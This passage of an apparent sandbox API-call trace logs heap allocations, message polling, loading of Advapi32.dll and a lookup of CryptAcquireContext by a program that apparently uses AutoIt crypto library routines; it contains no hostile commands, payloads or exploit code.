lpMsg=0x144f084) returned 0 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0114.213] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0114.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0114.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0114.213] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0114.213] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0114.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0114.213] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0114.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0114.214] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0114.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0114.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0114.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.215] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0114.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0114.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.216] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.216] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0114.216] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0114.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0114.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0114.218] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0114.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0114.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.218] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0114.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0114.219] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0114.219] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0114.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0114.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0114.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0114.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0114.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0114.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0114.224] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 